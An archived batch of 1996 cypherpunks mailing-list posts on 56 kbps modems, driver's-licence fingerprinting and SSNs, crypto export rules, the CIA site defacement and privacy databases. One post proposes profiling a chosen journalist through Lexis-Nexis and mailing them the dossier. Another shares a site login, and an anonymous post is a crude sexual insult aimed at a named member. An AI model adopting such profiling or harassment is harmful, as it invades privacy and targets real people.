> >I guess the esteemed judge doesn't believe in Halloween....
> 


**Benjamin Bradley Froomkin, b. Sept. 13, 1996, 8 lbs 14.5oz 21.5"**

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's hot here.  And humid.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Fri, 20 Sep 1996 18:48:54 +0800
To: cypherpunks@toad.com
Subject: Re: 56 kbps modems
Message-ID: <199609200744.AAA07457@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


I checked the Rockwell home page, which has a pointer to the press
release.  It isn't very technical, but gives some good clues.  It
looks like they're doing an interesting trick.  The modems aren't
designed for use like traditional modems, where the same equipment is
on each end.  Instead, there is a digital interface on one side of the
phone call (like at an Internet Service Provider).  The consumer side
modem has a traditional analog interface.

The rest of this is speculation and fantasy on my part.

So, think about it.  The analog side will generate voltages and send
them to the local central office, where they will be digitized and
sent to the destination central office digitally.  There, they will be
patched into one channel of a T1 line (out of 24) and sent digitally
to the ISP's "modem bank".  Equipment is already available (and in use
all over the uunet network) that plugs T1 into a board full of digital
signal processors, decodes each of the 24 channels (each channel
running any modem signalling protocol, or ISDN), handles PPP packet
framing, and gateways the resulting packets to/from an Ethernet.

Now for Rockwell's trick, you get the DSP's in the two modems to talk
to each other.  They can run some simple coding scheme (say ordinary
2400 baud modem for this example) to pass digital data back and forth
while they're negotiating the full blown deal.  First, the analog side
sync's up with the clock for the 8000 samples/sec that the central
office is digitizing (into 8-bit samples).  You can do that by sending
one voltage and then switching to another; the far side can tell you
whether you switched on a sample-boundary or not (was there a sample
"in between" before it settled to the new value?).

OK, then, in each sample slot, the analog side can send one of 256
different voltages.  The digital side can tell it the 8-bit values it
received.  Then fine-tune that to sending 128 different voltages,
taking particular care around the ones that got distorted the first
time.  As long as you can find 128 distinct voltage levels that the
central office will reliably digitize, you're done.  You're sending
7-bit samples at 8000 samples/sec.  Do something similar for the
analog receive side, and you can start passing user data at 56K.

If the robbed-bit stuff gets in the way of seeing 128 distinct voltage
levels in every byte, you can send solid zeroes or solid ones in each
direction and see which bits they're stealing out of which bytes.
Use most of the 8 bits available in the other bytes (you can find e.g.
200 different voltage levels that will work), and in the stolen byte,
you can find e.g. 100 voltage levels that work.  This is more bits
than using 128 voltage levels in every byte, and in fact you can
probably get closer to 64 kbits/sec than to 56 kbits/sec, depending on
the analog qualities of the wire to your central office.

A nice trick!  It won't speed up analog-modem-to-analog-modem
connections, but those will increasingly be a smaller and smaller
fraction anyway, as the digital infrastructure becomes cheap.  And
of course the 56K modems will just be DSP's with decent A/D and D/A
interfaces, so they can run all the old analog protocols too, in the
case that the phone line isn't digitized, or if they want to talk to
an old modem.

	John




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering <pgf@acadian.net>
Date: Fri, 20 Sep 1996 16:18:02 +0800
To: cypherpunks@toad.com
Subject: Re: DL in exchange for fingerprint
In-Reply-To: <199609200149.SAA23613@abraham.cs.berkeley.edu>
Message-ID: <Pine.SOL.3.93.960920005225.17491C-100000@stiletto.acadian.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 19 Sep 1996, John Anonymous MacDonald wrote:

> tcmay@got.net (Timothy C. May) writes:
 
> > So, just what it is _your_ method of dealing with this? While it is noble
> > to talk about fighting the system, just how do you go about doing it
> > yourself?
 
> How about just putting your finger in a cast or splint before you
> renew your license?

Does Nevada have the same rules as California wrt fingerprints for
driver's licenses?
 
(Of course, this concept has been rehashed a hundred times on the
list even during that fraction of its existance that I have been here).

Phil Fraering              "And the moral of the story is,
pgf@acadian.net            *never count your boobies until they
318/261-9649               are hatched*."
                            - James Thurber, "The Unicorn in the Garden"







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew Gream <matt@lust.bio.uts.edu.au>
Date: Fri, 20 Sep 1996 02:40:52 +0800
To: scmayo@rschp2.anu.edu.au (Sherry Mayo)
Subject: Re: Australian "ITAR" regulations
In-Reply-To: <199609190543.WAA01040@toad.com>
Message-ID: <199609191504.BAA11734@lust.bio.uts.edu.au>
MIME-Version: 1.0
Content-Type: text/plain



Hi Sherry,

> Some time ago I had various email exchanges regarding Australian crypto 
> export regulations. More recently I've been put in the picture by David
> Cox and others that there are in fact ITAR-like laws in force in Australia.
> The last time I looked into this, Matt Crean(?) had very little luck finding
> any info from the various relevant departments, have of whom didn't seem
> to have a clue.

Yes I did in fact investigate this area back in 1994. I managed to obtain
sufficient information to indicate that there were ITAR like controls in 
place. My liasons with departments did result in some vague answers though,
but the legislation was clear. You can find details about my findings at:
  http://www.next.com.au/spyfood/geekgirl/001stick/crypto/aust/index.html
I've not revisited the area since that time, so there may have been  
recent developments.

As you have mentioned, there are indeed controls. The regulations enforce
these through two mechanisms; the first being explict coverage in the 
Prohibited Exports Regulations, and the second through COCOM related DUT 
controls via. documentation referenced in said regulations. This latter 
area may have been revised with recent COCOM activity.

At the time, and I suspect still at this point in time, there seems to be
little awareness that these controls are in place.

Cheers,
Matthew.

-- 
Matthew Gream -- matt@lust.bio.uts.edu.au.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skeeve@skeeve.net (Skeeve Stevens)
Date: Fri, 20 Sep 1996 03:14:52 +0800
To: mikev@is.co.za (Mike van der Merwe)
Subject: Re: CIA hacked
In-Reply-To: <Pine.GSO.3.95.960919130705.28208H-100000@admin.is.co.za>
Message-ID: <199609191511.BAA24236@myinternet.myinternet.net>
MIME-Version: 1.0
Content-Type: text/plain


You, Mike van der Merwe, shaped the electrons to say:
+
+
+Hi everybody
+
+Heh! This one's good for a laugh :-))
+
+http://www.odci.gov/cia
+
+Seems the DOJ hack was a good inspiration. Heh! Life's good when you're
+willing to work at it.
+
+Later
+Mike

Did you or anyone get a mirror of the site?! I wanna set one up! ;)


--------------------------------------------------------------------
Skeeve Stevens                              Email: skeeve@skeeve.net
CEO/The Big Boss/All round nice guy      URL: http://www.skeeve.net/
MyInternet                               Australian Anglicans Online
http://www.myinternet.net/               http://www.anglican.asn.au/
Phone: (+612) 869-3334        Mobile: (0414) SKEEVE [+61414-753-383]
Key fingerprint  =  D2 7E 91 53 19 FE D0 5C  DE 34 EA AF 7A 5C 4D 3E




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skeeve@skeeve.net (Skeeve Stevens)
Date: Fri, 20 Sep 1996 04:42:27 +0800
To: mikev@is.co.za (Mike van der Merwe)
Subject: Re: CIA hacked
In-Reply-To: <Pine.GSO.3.95.960919171843.6261B-100000@admin.is.co.za>
Message-ID: <199609191540.BAA24455@myinternet.myinternet.net>
MIME-Version: 1.0
Content-Type: text/plain


You, Mike van der Merwe, shaped the electrons to say:
+
+
+On Fri, 20 Sep 1996, Skeeve Stevens wrote:
+
+Check out http://titus.is.co.za/mikev/cia_hack


Thanx... An Australian Mirror of the site is up on

http://www.skeeve.net/cia/     the doj mirror is http://www.skeeve.net/doj/


--------------------------------------------------------------------
Skeeve Stevens                              Email: skeeve@skeeve.net
CEO/The Big Boss/All round nice guy      URL: http://www.skeeve.net/
MyInternet                               Australian Anglicans Online
http://www.myinternet.net/               http://www.anglican.asn.au/
Phone: (+612) 869-3334        Mobile: (0414) SKEEVE [+61414-753-383]
Key fingerprint  =  D2 7E 91 53 19 FE D0 5C  DE 34 EA AF 7A 5C 4D 3E




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Osborne <osborne@gateway.grumman.com>
Date: Fri, 20 Sep 1996 16:28:47 +0800
To: cypherpunks@toad.com
Subject: CNET Digital Dispatch  Vol. 2 No. 38
Message-ID: <3.0b19.32.19960920021220.0050fc50@gateway.grumman.com>
MIME-Version: 1.0
Content-Type: text/plain


This week's c|net digital dispatch had the following top ten list.  For
number 8, did they mean DES or is the EDS something I'm not aware of.  I
figure it has to be because what does DES have to do with chat rooms?

>9. TOP TEN REASONS WHY THE PRESIDENTIAL DEBATES WON'T TAKE
>PLACE ON THE WEB
>
>10. Kemp would fight with Dole over who gets to
>    "quarterback" the keyboard.
>9. Oops: Gore plugged information superhighway cable
>   into White House central vacuum system.
>8. Perot's crack team of EDS hackers would get him
>   in somehow.
>7. Hotwired editors say presidential candidates not
>   hip enough.
>6. Hillary doesn't let the President in ANY chat rooms.
>5. Debate commission insists: event must be on Prodigy.
>4. Bill Gates owns the rights to online debates.
>3. Dole's Selectric won't connect to the Net.
>2. Chelsea is using the White House PC to write a
>   book report.
>1. In cyberspace, no one can feel your pain.


____________________________________________________________
Rick Osborne                     osborne@gateway.grumman.com
"The universe doesn't give you any points for doing things that are easy."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@Cor.sos.sll.se>
Date: Fri, 20 Sep 1996 11:25:09 +0800
To: cypherpunks@toad.com
Subject: Re: More proposals for European censorship
In-Reply-To: <01I9O2D1BGCO8Y4ZFQ@mbcl.rutgers.edu>
Message-ID: <Pine.HPP.3.91.960920022911.25603A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 19 Sep 1996, E. Allen Smith forwarded:

>> STRASBOURG, France (Sep 19, 1996 11:24 a.m. EDT) - The European
>> Parliament pressed the European Union on Thursday to act to curb child
>> sex and trafficking rings, saying the fight against sexual abuse of
>> children must be an "absolute priority."

It's probably no coincidence that the recently busted, utter horrible
child-molesting ring, with obvious protection from various persons
in the establishment, was centered in Belgium - that's where the EU
bureaucrat nomenklatura play their power games and go to bordellos.

Asgaard






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 21 Sep 1996 01:00:08 +0800
To: cypherpunks@toad.com
Subject: Re: Re: CIA hacked
In-Reply-To: <19960920051144046.AAA184@GIGANTE>
Message-ID: <VBZJuD10w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


>From Adamsc@io-online.com  Fri Sep 20 01:12:21 1996
Received: by bwalk.dm.com (1.65/waf)
	via UUCP; Fri, 20 Sep 96 01:24:04 EDT
	for dlv
Received: from [206.245.244.5] by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP;
        id AA10200 for dlv@bwalk.dm.com; Fri, 20 Sep 96 01:12:21 -0400
Received: from GIGANTE ([206.245.244.204]) by irc.io-online.com
          (post.office MTA v2.0 0813 ID# 285-17715) with SMTP id AAA184
          for <dlv@bwalk.dm.com>; Thu, 19 Sep 1996 22:11:52 -0700
From: Adamsc@io-online.com (Adamsc)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Date: Thu, 19 Sep 96 22:12:08 -0800
Reply-To: "Chris Adams" <adamsc@io-online.com>
X-Mailer: Chris Adams's Registered PMMail 1.52 For OS/2
X-Filtered: By PMMail 1.52 For OS/2
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Subject: Re: Re: CIA hacked
Message-Id: <19960920051144046.AAA184@GIGANTE>

 You are being gently flamed because.

   [X] you continued a boring useless stupid thread
   [ ] you repeatedly posted to the same thread that you just posted to
   [x] you repeatedly initiated incoherent, flaky, and mindless threads
   [x] you posted a piece riddled with profanities
   [ ] you advocated Net censorship
   [ ] you SCREAMED! (used all caps)
   [x] you posted some sort of crap that doesn't belong in this group
   [ ] you posted the inanely stupid 'Make Money Fast' article
   [ ] you threatened others with physical harm
   [x] you made a bigoted statement(s)
   [x] you repeatedly assumed unwarranted moral or intellectual superiority
   [x] you are under the misapprehension that this group is your preserve
   [x] you repeatedly shown lack of humor
   [x] you are apparently under compulsion to post to every threat
   [?] you are posting an anonymous attack

  >>> Thank you for the time you have taken to read this.  Live n' Learn.<<<



# Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
# cadams@acucobol.com | V.M. (619)515-4894
"I have never been able to figure out why anyone would want to play games on
a computer in any case when the whole system is a game.  Word processing,
spreadsheets, telecoms -- it's all a game.  And they pay you to play it."
	-- Duncan Frissell






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 21 Sep 1996 00:51:49 +0800
To: cypherpunks@toad.com
Subject: Re: Re: CIA hacked
In-Reply-To: <19960920051400906.AAA199@GIGANTE>
Message-ID: <0BZJuD11w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


>From Adamsc@io-online.com  Fri Sep 20 01:14:30 1996
Received: by bwalk.dm.com (1.65/waf)
	via UUCP; Fri, 20 Sep 96 01:24:05 EDT
	for dlv
Received: from [206.245.244.5] by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP;
        id AA10241 for dlv@bwalk.dm.com; Fri, 20 Sep 96 01:14:30 -0400
Received: from GIGANTE ([206.245.244.204]) by irc.io-online.com
          (post.office MTA v2.0 0813 ID# 285-17715) with SMTP id AAA199
          for <dlv@bwalk.dm.com>; Thu, 19 Sep 1996 22:14:03 -0700
From: Adamsc@io-online.com (Adamsc)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Date: Thu, 19 Sep 96 22:14:25 -0800
Reply-To: "Chris Adams" <adamsc@io-online.com>
X-Mailer: Chris Adams's Registered PMMail 1.52 For OS/2
X-Filtered: By PMMail 1.52 For OS/2
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Subject: Re: Re: CIA hacked
Message-Id: <19960920051400906.AAA199@GIGANTE>

 You are being gently flamed because.

   [X] you continued a boring useless stupid thread
   [ ] you repeatedly posted to the same thread that you just posted to
   [x] you repeatedly initiated incoherent, flaky, and mindless threads
   [x] you posted a piece riddled with profanities
   [ ] you advocated Net censorship
   [ ] you SCREAMED! (used all caps)
   [x] you posted some sort of crap that doesn't belong in this group
   [ ] you posted the inanely stupid 'Make Money Fast' article
   [ ] you threatened others with physical harm
   [x] you made a bigoted statement(s)
   [x] you repeatedly assumed unwarranted moral or intellectual superiority
   [x] you are under the misapprehension that this group is your preserve
   [x] you repeatedly shown lack of humor
   [x] you are apparently under compulsion to post to every threat
   [?] you are posting an anonymous attack

  >>> Thank you for the time you have taken to read this.  Live n' Learn.<<<



# Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
# cadams@acucobol.com | V.M. (619)515-4894
"I have never been able to figure out why anyone would want to play games on
a computer in any case when the whole system is a game.  Word processing,
spreadsheets, telecoms -- it's all a game.  And they pay you to play it."
	-- Duncan Frissell






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 21 Sep 1996 00:25:22 +0800
To: cypherpunks@toad.com
Subject: Re: Re: [NEWS] Crypto-relevant wire clippings
In-Reply-To: <19960920050709843.AAA186@GIGANTE>
Message-ID: <9iZJuD12w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


>From Adamsc@io-online.com  Fri Sep 20 01:07:49 1996
Received: by bwalk.dm.com (1.65/waf)
	via UUCP; Fri, 20 Sep 96 01:24:03 EDT
	for dlv
Received: from [206.245.244.5] by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP;
        id AA09924 for dlv@bwalk.dm.com; Fri, 20 Sep 96 01:07:49 -0400
Received: from GIGANTE ([206.245.244.204]) by irc.io-online.com
          (post.office MTA v2.0 0813 ID# 285-17715) with SMTP id AAA186
          for <dlv@bwalk.dm.com>; Thu, 19 Sep 1996 22:07:13 -0700
From: Adamsc@io-online.com (Adamsc)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Date: Thu, 19 Sep 96 22:07:34 -0800
Reply-To: "Chris Adams" <adamsc@io-online.com>
X-Mailer: Chris Adams's Registered PMMail 1.52 For OS/2
X-Filtered: By PMMail 1.52 For OS/2
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Subject: Re: Re: [NEWS] Crypto-relevant wire clippings
Message-Id: <19960920050709843.AAA186@GIGANTE>

 You are being gently flamed because.

   [X] you continued a boring useless stupid thread
   [ ] you repeatedly posted to the same thread that you just posted to
   [x] you repeatedly initiated incoherent, flaky, and mindless threads
   [x] you posted a piece riddled with profanities
   [ ] you advocated Net censorship
   [ ] you SCREAMED! (used all caps)
   [x] you posted some sort of crap that doesn't belong in this group
   [ ] you posted the inanely stupid 'Make Money Fast' article
   [ ] you threatened others with physical harm
   [x] you made a bigoted statement(s)
   [x] you repeatedly assumed unwarranted moral or intellectual superiority
   [x] you are under the misapprehension that this group is your preserve
   [x] you repeatedly shown lack of humor
   [x] you are apparently under compulsion to post to every threat
   [?] you are posting an anonymous attack

  >>> Thank you for the time you have taken to read this.  Live n' Learn.<<<



# Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
# cadams@acucobol.com | V.M. (619)515-4894
"I have never been able to figure out why anyone would want to play games on
a computer in any case when the whole system is a game.  Word processing,
spreadsheets, telecoms -- it's all a game.  And they pay you to play it."
	-- Duncan Frissell






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Corbet <corbet@stout.atd.ucar.edu>
Date: Sat, 21 Sep 1996 02:05:41 +0800
To: cypherpunks@toad.com
Subject: anonymous bacon
Message-ID: <199609201506.JAA03295@atd.atd.ucar.EDU>
MIME-Version: 1.0
Content-Type: text/plain


The following, from RISKS, deserves redistribution....

Date: Tue, 17 Sep 1996 13:04:47 -0400
From: pcw@access.digex.net (Peter Wayner)
Subject: Bringing Home the Anonymous Bacon

The *Baltimore Sun* reports in its 17 Sep 1996 issue that people in
Baltimore are paying for drugs with meat (page A1! [pretty saucy!]).  
Perhaps this is not yet anonymous digital cash, but certainly anonymous.

   [Now someone is going to propose keeping a database of all sides of beef,
   and steganographically watermarking the meat in the context of digitally
   signed scannable grade-stamps.  Perhaps the next step in monitoring the
   private drug-meat trade would be to escrow the inspectors' private keys,
   derived from the product of two U.S. Primes, and put the database up on
   the net: the T-bone connected to the M-bone, etc.?  PGN]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Sat, 21 Sep 1996 00:27:49 +0800
To: banisar@epic.org
Subject: Cellular Industry rejects US plan for surveillance
Message-ID: <199609201419.JAA09136@homeport.org>
MIME-Version: 1.0
Content-Type: text


Front page of todays New York Times.

"But many industry executives and privacy-rights advocates disagree
with the government's interpretation of the [Digital telephony] law.
The industry says that the new cellular abilities would be
burdensomely expensive to administer...."


http://www.nytimes.com/yr/mo/day/news/financial/cellular-phone-monitor.html
Login, of course, is cypherpunks, password cypherpunks

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjb@ny.ubs.com
Date: Sat, 21 Sep 1996 01:15:22 +0800
To: DMiskell@envirolink.org
Subject: Re: All Bets Off
Message-ID: <199609201336.JAA09683@sherry.ny.ubs.com>
MIME-Version: 1.0
Content-Type: text/plain


actually, i understood that he was an insurance salesman.

	-paul

> From cypherpunks-errors@toad.com Fri Sep 20 06:43:59 1996
> Date: Thu, 19 Sep 1996 17:19:44 -0400 (EDT)
> From: The Deviant <deviant@pooh-corner.com>
> To: Daniel Christopher Miskell <DMiskell@envirolink.org>
> Cc: Rabid Wombat <wombat@mcfeely.bsfs.org>, cypherpunks@toad.com
> Subject: Re: All Bets Off
> Organization: The Silicon Pirates
> Mime-Version: 1.0
> Content-Type> : > TEXT/PLAIN> ; > charset=US-ASCII> 
> Sender: owner-cypherpunks@toad.com
> Content-Length: 754
> 
> On Thu, 19 Sep 1996, Daniel Christopher Miskell wrote:
> 
> > Date: Thu, 19 Sep 1996 11:30:32 -0400
> > From: Daniel Christopher Miskell <DMiskell@envirolink.org>
> > To: Rabid Wombat <wombat@mcfeely.bsfs.org>
> > Cc: cypherpunks@toad.com
> > Subject: Re: All Bets Off
> > 
> > >On Tue, 17 Sep 1996, Jeff Davis wrote:
> > >
> 
> [lots of quoting rm'd]
> 
> > 
> > Tom Clancy is not a military-hired brain, but to make his novels realistic and
> > to do justice to the people he portrays, he does a LOT of research.  He is a
> > highly respected author, and I have no doubt that his statement is based on
> > his personal findings, collected for a previous novel.
> > 
> 
> I beleive he was also a Capain in the Navy...
> 
>  --Deviant
> Old MacDonald had an agricultural real estate tax abatement.
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: DMiskell@envirolink.org (Daniel Christopher Miskell)
Date: Sat, 21 Sep 1996 01:49:37 +0800
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Subject: Re: The periodic caveat about Timmy May
Message-ID: <v01540b01ae685c6928b3@[150.160.45.150]>
MIME-Version: 1.0
Content-Type: text/plain


>attila <attila@primenet.com> writes:
>
>> In <199609190517.HAA00851@basement.replay.com>, on 09/19/96
>>    at 07:17 AM, nobody@flame.alias.net (Anonymous) said:
>>
>> = .Timmy May habitually digs into his cesspool of a mind for his
>> = .mailing list fertilizer.
>>
>>         this is humour.   it tickles the imagination, and the reference
>>     to tim is lost!
>
>Can we get all this non-crypto-relevant shit off of this mailing list please?
>
>---
>
>Dr.Dimitri Vulis KOTM
>Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

Sorry, dear, but complaining isn't going to change it, and simple telling people
to shut the fuck up is going to go nowhere.  If you want solely crypto relevent
material, subscribe to the filtered list.  I mean, come on -- you know this list
is suseptable (sp?) to noise and spam.

Besides, people suggest to me that you are the anonymous mailer.  So maybe you
should keep a low profile on this.

--
If in fact we are the only intelligent life on this planet, why the fuck are
we in this goddamn mess?
--
Find my public key on the World Wide Web -- point your browser at:
http://bs.mit.edu:8001/pks-toplev.html






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Fri, 20 Sep 1996 19:28:45 +0800
To: cypherpunks@toad.com
Subject: other Lexis-Nexis databases
Message-ID: <199609200804.KAA25534@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

A brief search of www.lexis-nexis.com reveals a few interesting
details:


1.  You can look up people in P-TRAK by SSN.

2.  There are many other databases of personal information,
including:

a.  "REZIDE", "searchable by congressional district, area code 
plus exchange, county, state, metropolitan statistical area 
(MSA) and dominant market area (DMA)" and "providing a detailed
demographic portrait [...] including age, income, race, 
ethnicity, household composition, employment", a "White/Blue
collar index" and a "family life-cycle code".

b.  "DCEASE", giving information including SSN about dead
people.

c.  An assets database identifying real-estate or FAA-registered
aircraft owned by people.

d.  Something called "P-FIND" which is advertised as "having 
greater detail [than P-TRAK] with regard to the individual's 
household (value of home, number of dependents)".  This one
appears in a newsletter from 1994, so the service may be
discontinued (although of course the data still exists...).



It would be a fun experiment and a good cypherpunk publicity
stunt to test Lexis-Nexis out.  Pick a demo victim, 
e.g. a journalist who is honest, smart and concerned about such
issues, but not one who is too famous or rich.  Use Lexis-Nexis
(and possibly other resources) to learn all that you can about 
him/her.  If he/she lives in a sparsely-populated area a narrow
enough REZIDE search might give income, number of persons in 
household, marital status, age, schooling, ethnicity, vehicles 
owned, and employment, and that would be with a single search.


Compile everything you know and send it to the victim,
explaining how you got the information.


Regards,

Bryce




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMkJQCUjbHy8sKZitAQFb8AL/f2yQWv1R4QcftBF4khw0DZrd/szZqte3
UQ0HvjtAdjiVee7aLiumljMUqyMOzsXQlkWKh1/JXmbgVAVrsJGhZEFCyqbheUwP
eqhP1QEYVHfjueQy1FlSb7U3f+VI2tzk
=mky+
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David Lesher / hated by RBOC's in 5 states" <wb8foz@wauug.erols.com>
Date: Sat, 21 Sep 1996 01:30:39 +0800
To: gnu@toad.com (John Gilmore)
Subject: Re: 56 kbps modems
In-Reply-To: <199609200744.AAA07457@toad.com>
Message-ID: <199609201408.KAA11269@wauug.erols.com>
MIME-Version: 1.0
Content-Type: text/plain


John Gilmore sez:
> 
> 
> The rest of this is speculation and fantasy on my part.

{....}

This goes along with what others have postulated.

But I have to wonder -- how long will the [re]train take?
One of the gripes about PEP was that retrains were slow....
This sounds slower.

Further, how stable will the outcome be -- will the 'slop' in the 
CO's AD conversion overwhelm things?

Lastly, what will the RBOC's do to stifle its use? [I take it as a
given that they will object to anything that benefits subscribers
and does not give them an added cut.. witness ISDN pricing, for
example.]

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sat, 21 Sep 1996 07:18:37 +0800
To: cypherpunks@toad.com
Subject: Re: DL in exchange for fingerprint
Message-ID: <3.0b16.32.19960919224547.00c48460@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:10 PM 9/19/96 -0700, Timothy C. May wrote:
>At 9:13 PM 9/19/96, Gary Howland wrote:
>>> Paraphrasing that famous quote, just which part of "not for
identification"
>>> don't they understand?
>>
>>Hmm - who are you paraphrasing here? (Just curious).
>
>"What part of "No" don't you understand?"
>
>and
>
>"What part of "Congress shall make no law" don't you understand?"

The question as to Social Security numbers came up earlier today in a
conversation off-list.

Do any of the lawyer types that hang out here know the exact statutes as to
use and misuse of Social Security numbers?

My understanding (probably flawed) is that it is (or was) illegal for
certain types of businesses to ask for SS numbers.

Does anyone know what the actual laws regarding this are?  Pointers to
statute numbers would also be appreciated.

Also, I noticed that the text "Not for Indentification" does not appear on
later versions of the Social Security cards.  (Comparing my card with my
fathers showed some interesting differences.  That text change was the most
glaring.)


---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kurt Vile <burris@apdg.com>
Date: Sat, 21 Sep 1996 02:30:29 +0800
To: cypherpunks@toad.com
Subject: Re: DL in exchange for fingerprint
In-Reply-To: <ae66bb9816021004790c@[207.167.93.63]>
Message-ID: <199609201528.KAA13170@apdg.com>
MIME-Version: 1.0
Content-Type: text/plain



>By the way, the next rev of the California driver's license will
>reportedly have one's *Social Security Number* printed on the card!
>So much for the statement clearly printed on my card:

Illinois already has such a law, in fact you must have an SSN to  
even get a DL.  Fortunately, the law allows a citizen-unit to choose  
if they want their SSN on their DL (imagine that, a choice!) - the  
flip side is that you have to specifically ask them not to print  
them - they won't ask you.

One would hope that CA's law might provide a similar out...

--Kurt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Sat, 21 Sep 1996 05:12:56 +0800
To: cypherpunks@toad.com
Subject: A daily warning regarding Tim C[ocksucker] Maya, the lying sack of shit
Message-ID: <199609201738.KAA00561@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Tim C[ocksucker] Maya studied yoga back-streching exercises for 
five years so he could blow himself (nobody else will).





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 21 Sep 1996 03:41:57 +0800
To: cypherpunks@toad.com
Subject: [NEWS] Crypto-relevant wire clippings
Message-ID: <PN7JuD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


New York Times, Tuesday, September 17, 1996

Intuit Selling Bill-Processing Unit For $227 Million

By LAURIE J. FLYNN

Intuit Inc., the United States' leading seller of personal-finance
software, announced Monday that it would sell its electronic
bill-payment processing business to its main competitor in that field,
Checkfree Corp., for $227.6 million in stock.

Intuit, which also announced widening financial losses Monday, now
intends to focus on its core software businesses, while expanding its
services over the Internet.

The deal with Checkfree comes as Intuit is under pressure from the banks
it works with, which want to expand their options for electronic
bill-processing. Currently, banks wishing to provide electronic services
to consumers using Intuit's popular Quicken personal-finance software
have had to operate through Intuit's bill-processing subsidiary, Intuit
Services Corp.

Lately, consumers and financial institutions have shown a preference for
conducting business over the Internet rather than over proprietary
networks like Intuit Services. But while Intuit had come to view bill
processing as a costly distraction, Checkfree said that adding Intuit's
operations would be a cost-effective way of expanding its own main line
of business.

Checkfree, based in Columbus, Ohio, markets its electronic
transaction-processing services exclusively to banks and other financial
institutions. Those customers use Checkfree's services to provide home
banking and bill payment to consumers. Unlike Intuit's network,
Checkfree's operations will work with a variety of personal-finance
programs.

With the acquisition of the Intuit Services unit, Checkfree gains
Intuit's relationships with 39 banks and more than 300,000 electronic
bill-processing customers, bringing its total number of bank customers
to 181 and its consumer base to nearly 1.2 million.

The companies, both of whose stocks surged on the news, said they
expected to close the deal by the end of the year, pending regulatory
and shareholder approval. Intuit's stock rose $2.125 a share Monday, to
$32.25; Checkfree gained $3.1875, to $21.25.

Wall Street analysts applauded Intuit's decision to withdraw from what
they said amounted to the back end of the transaction-processing
business, at a time when more full-fledged electronic commerce may
finally be catching on.

